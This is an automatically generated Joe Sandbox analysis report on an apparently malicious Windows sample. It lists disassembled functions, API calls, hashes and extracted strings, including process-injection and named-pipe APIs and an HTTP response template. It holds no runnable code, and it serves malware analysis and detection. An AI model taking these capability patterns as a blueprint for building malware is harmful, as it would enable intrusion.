                                            • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                            • Instruction Fuzzy Hash: 3B519D72708791C6DB10DB65E8453AEA7A2F384BD4F908016EE8E47B58EF7CD619CB40
                                            APIs
                                            • _mtinitlocknum.LIBCMT ref: 007DA375
                                              • Part of subcall function 007D3E58: _FF_MSGBANNER.LIBCMT ref: 007D3E75
                                              • Part of subcall function 007D3E58: _NMSG_WRITE.LIBCMT ref: 007D3E7F
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 007DA3F8
                                            • EnterCriticalSection.KERNEL32 ref: 007DA414
                                            • LeaveCriticalSection.KERNEL32 ref: 007DA424
                                            • _calloc_crt.LIBCMT ref: 007DA49A
                                            • __lock_fhandle.LIBCMT ref: 007DA502
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                            • String ID:
                                            • API String ID: 445582508-0
                                            • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                            • Instruction ID: 2d9044158b8040b5af5a71944785d6eb7b825736bae86f61e078f4aff0632ac0
                                            • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                            • Instruction Fuzzy Hash: 8951F432604B8092DB20CF24D44832DB7B9FB98B58F19412BDE8E477A4DBBCD852C702
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                              • Part of subcall function 007D0620: _errno.LIBCMT ref: 007D0577
                                              • Part of subcall function 007D0620: _invalid_parameter_noinfo.LIBCMT ref: 007D0582
                                            • fseek.LIBCMT ref: 007C1730
                                              • Part of subcall function 007D0EA4: _errno.LIBCMT ref: 007D0ECC
                                              • Part of subcall function 007D0EA4: _invalid_parameter_noinfo.LIBCMT ref: 007D0ED7
                                            • _ftelli64.LIBCMT ref: 007C1738
                                              • Part of subcall function 007D0F18: _errno.LIBCMT ref: 007D0F36
                                              • Part of subcall function 007D0F18: _invalid_parameter_noinfo.LIBCMT ref: 007D0F41
                                            • fseek.LIBCMT ref: 007C1748
                                              • Part of subcall function 007D0EA4: _fseek_nolock.LIBCMT ref: 007D0EF5
                                            • GetFullPathNameA.KERNEL32 ref: 007C176B
                                            • malloc.LIBCMT ref: 007C1788
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                              • Part of subcall function 007BD044: malloc.LIBCMT ref: 007BD057
                                              • Part of subcall function 007BD074: htonl.WS2_32 ref: 007BD07F
                                            • fclose.LIBCMT ref: 007C1845
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                            • String ID:
                                            • API String ID: 3587854850-0
                                            • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                            • Instruction ID: 23462840a2f624fd2d7165add7eb55d5cca708d83b870643b6ef102d59336e70
                                            • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                            • Instruction Fuzzy Hash: BE41A422714690C2DB54EB22E459B6E6351F7C9BD0F84823AEE5E47B96EF3CC506C740
                                            APIs
                                            • GetACP.KERNEL32 ref: 007C5C78
                                            • GetOEMCP.KERNEL32 ref: 007C5C82
                                            • GetCurrentProcessId.KERNEL32 ref: 007C5CA8
                                            • GetTickCount.KERNEL32 ref: 007C5CB0
                                              • Part of subcall function 007D044C: _getptd.LIBCMT ref: 007D0454
                                            • GetCurrentProcess.KERNEL32 ref: 007C5CEC
                                              • Part of subcall function 007C0C64: GetModuleHandleA.KERNEL32 ref: 007C0C79
                                              • Part of subcall function 007C0C64: GetProcAddress.KERNEL32 ref: 007C0C89
                                            • GetCurrentProcessId.KERNEL32 ref: 007C5D5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                            • String ID:
                                            • API String ID: 3426420785-0
                                            • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                            • Instruction ID: 9c285f900ef5b7203c80a4bed89d9839bc8d970a482edaf4f803f7966ab1e898
                                            • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                            • Instruction Fuzzy Hash: D541C322710A14D5EF10EBB1DC89BDD23A5BB88794F404429EE4987B66EF3CC50AC750
                                            APIs
                                            • malloc.LIBCMT ref: 007C6F5E
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • htonl.WS2_32 ref: 007C6F91
                                            • recvfrom.WS2_32 ref: 007C6FD5
                                            • WSAGetLastError.WS2_32 ref: 007C6FE2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                            • String ID:
                                            • API String ID: 2310505145-0
                                            • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                            • Instruction ID: 265678bb80eac8b37e9cdb00526e328ac806e0615a9f2370d3384c3ff6da1e03
                                            • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                            • Instruction Fuzzy Hash: 6E418172619A81C6EB148F25E844B2A7765F788BA8F14422DEA9D47B68DF7CD4C1CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                            • String ID:
                                            • API String ID: 1014270282-0
                                            • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                            • Instruction ID: 9c31bb4b8359d3a4a117ed301001859023d77418ef7dc520611c7150d27b3866
                                            • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                            • Instruction Fuzzy Hash: F3317B32618B8486EB248F52D80879D77A5F788BD8F08852CEE4D47B55DF7CC605CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                            • String ID:
                                            • API String ID: 1547050394-0
                                            • Opcode ID: d456e60cd18e585d7b0932005af9489af9dd9e8d049e32befec81c7ac9aec1ea
                                            • Instruction ID: e81a125fe16178f6771da24200ed63f79ca3ee53e2efbb97e6759774b2df8238
                                            • Opcode Fuzzy Hash: d456e60cd18e585d7b0932005af9489af9dd9e8d049e32befec81c7ac9aec1ea
                                            • Instruction Fuzzy Hash: 8311D061318786D1EF11AB32AA0632EA695BB49BC0F89D431EF8DD7B15EB3CD4418B10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                            • String ID:
                                            • API String ID: 1547050394-0
                                            • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                            • Instruction ID: 97a368afd2c4a036e7aa32595ecfbdcfa6d850adf94adfc8229b8cf7aa920905
                                            • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                            • Instruction Fuzzy Hash: 44113461304782C2EB11AF32B80532EA2B1BB84BC0F585423EE8A97B05DF7CC4618B90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                            • String ID:
                                            • API String ID: 2102446242-0
                                            • Opcode ID: 2ede11a5ffacbd3a0c7ce17d7f552b13c6d3b5dbdab4f68e6337480dbd1f78a2
                                            • Instruction ID: cd09f9df51070100e5470b591be3c16f810f16e7028d255df1ed6f3416d360ff
                                            • Opcode Fuzzy Hash: 2ede11a5ffacbd3a0c7ce17d7f552b13c6d3b5dbdab4f68e6337480dbd1f78a2
                                            • Instruction Fuzzy Hash: 1F110471B84685C5DB057FA9BCD933D6E54EB817A0F9E4128EB1A0B392DB7CC842C314
                                            APIs
                                            • malloc.LIBCMT ref: 007BFC85
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • free.LIBCMT ref: 007BFCC0
                                            • fwrite.LIBCMT ref: 007BFD01
                                            • fclose.LIBCMT ref: 007BFD09
                                            • free.LIBCMT ref: 007BFD16
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • GetLastError.KERNEL32 ref: 007BFD1B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                            • String ID:
                                            • API String ID: 1616846154-0
                                            • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                            • Instruction ID: 62f6ccb2aeab6a5a1635503f12ef9f8a3eadc335583bb704d4a454ace0603f62
                                            • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                            • Instruction Fuzzy Hash: 5A11E711704784C2DE10FB22E8597AE9751BB89FE4F444239EF6E4BB8ADE3CC5058780
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                                            • String ID:
                                            • API String ID: 3798860377-0
                                            • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                            • Instruction ID: 5b75b0d536c3e6b0db47ac4a6f26b0494a607ecc9a788d516a5d25d4f6da0dfa
                                            • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                            • Instruction Fuzzy Hash: D411C132A08A9483F7109B25F528B2A7365F788BA4F50421CDA5E47A95CF7CC8568B01
                                            APIs
                                            • malloc.LIBCMT ref: 0077E40F
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 0077E41D
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • malloc.LIBCMT ref: 0077E43F
                                            • _snprintf.LIBCMT ref: 0077E45A
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • malloc.LIBCMT ref: 0077E475
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                            • String ID: dpoolWait
                                            • API String ID: 2026495703-1875951006
                                            • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                            • Instruction ID: 6955157d0026284ef7f2d6b9af207b6dc3e1c60d14b531a864c42a502356275d
                                            • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                            • Instruction Fuzzy Hash: 41018071705B9085DE44DB12B8487196699F7ACFE0F159269EEAD877C5CE3CC4418780
                                            APIs
                                            • malloc.LIBCMT ref: 007CF00F
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007CF01D
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • malloc.LIBCMT ref: 007CF03F
                                            • _snprintf.LIBCMT ref: 007CF05A
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • malloc.LIBCMT ref: 007CF075
                                            Strings
                                            • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 007CF044
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                            • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                            • API String ID: 3518644649-2739389480
                                            • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                            • Instruction ID: 41be2f082249ffbe328b9eee01bb5c37ab7ff68add7c6937e876735446cc256d
                                            • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                            • Instruction Fuzzy Hash: 66018076705B9082DA44DB52B848B1D679AF78CFE0F15522DEEA9877C5CF7CC4418780
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: freemallocstrchr$rand
                                            • String ID:
                                            • API String ID: 1305919620-0
                                            • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                            • Instruction ID: 53239cc0f1b111a33c46132aa22f2a539e5fe54af5aa26b264228e2970ebc0a4
                                            • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                            • Instruction Fuzzy Hash: 4F613862704FC481EE2A9B29A4153EAA390EF99BC8F089121DF9D17B56EF3DC147C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: freemallocstrchr$rand
                                            • String ID:
                                            • API String ID: 1305919620-0
                                            • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                            • Instruction ID: e1b4e4da7949e959da6c7e50062d112319f2f8147f30a593cd2ae27c37c0fd1a
                                            • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                            • Instruction Fuzzy Hash: D0612862608FC481EA269F29A4157EAA7A1FF95BC4F08812DDF8917B55EF3DC247C300
                                            APIs
                                            • malloc.LIBCMT ref: 007635BD
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 007635C8
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • free.LIBCMT ref: 007636AF
                                            • free.LIBCMT ref: 007636B7
                                            • free.LIBCMT ref: 007636BF
                                            • free.LIBCMT ref: 007636CB
                                            • free.LIBCMT ref: 007636D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc
                                            • String ID:
                                            • API String ID: 2761444284-0
                                            • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                            • Instruction ID: d8a4b2e8e5db2922ce260744b02ea9f41a7af5e6395cd5a6abf4bc3dcd5e9c36
                                            • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                            • Instruction Fuzzy Hash: FE41DD22704792ABDE19DF26D95436E6760FB5ABC0F444124DE5B8BB11EF3CDA22C701
                                            APIs
                                            • malloc.LIBCMT ref: 007B41BD
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007B41C8
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • free.LIBCMT ref: 007B42AF
                                            • free.LIBCMT ref: 007B42B7
                                            • free.LIBCMT ref: 007B42BF
                                            • free.LIBCMT ref: 007B42CB
                                            • free.LIBCMT ref: 007B42D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                            • String ID:
                                            • API String ID: 996410232-0
                                            • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                            • Instruction ID: c37053070ae06a22f5a60281e37914e21874e9fb36ceaca493a60f80984555d1
                                            • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                            • Instruction Fuzzy Hash: FD41FF263007968BDF1AEB66A9547EE6761F749BC0F404128EF4647B16EF3CD826C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: htonl$freemalloc
                                            • String ID: zyxwvutsrqponmlk
                                            • API String ID: 1249573706-3884694604
                                            • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                            • Instruction ID: 1b10ec65e46c10d0e9ad8fc2d921e16f176341096b3b78e3029c0fba67767cdf
                                            • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                            • Instruction Fuzzy Hash: CF21073630578086DB14EF76A99A76D6BD1A789FD0F04443DEE9A87B5BEE3CC5068300
                                            APIs
                                            • GetModuleHandleA.KERNEL32 ref: 007C3FE7
                                            • GetProcAddress.KERNEL32 ref: 007C3FF7
                                            • GetLastError.KERNEL32 ref: 007C40BF
                                              • Part of subcall function 007CCC00: GetCurrentProcess.KERNEL32 ref: 007CCC8D
                                              • Part of subcall function 007CD134: GetCurrentProcess.KERNEL32 ref: 007CD161
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                                            • String ID: NtMapViewOfSection$ntdll.dll
                                            • API String ID: 1006775078-3170647572
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: signal
                                            • String ID: CCG
                                            • API String ID: 1946981877-1584390748
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: strtok$_getptd_time64malloc
                                            • String ID: eThreadpoolTimer
                                            • API String ID: 1522986614-2707337283
                                            APIs
                                            • malloc.LIBCMT ref: 007713D2
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • _snprintf.LIBCMT ref: 007713F1
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • remove.LIBCMT ref: 007713FD
                                            • remove.LIBCMT ref: 00771404
                                            Strings
                                            • uld not open process: %d (%u), xrefs: 007713D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                            • String ID: uld not open process: %d (%u)
                                            • API String ID: 2566950902-823969559
                                            APIs
                                            • malloc.LIBCMT ref: 007C1FD2
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • _snprintf.LIBCMT ref: 007C1FF1
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • remove.LIBCMT ref: 007C1FFD
                                            • remove.LIBCMT ref: 007C2004
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
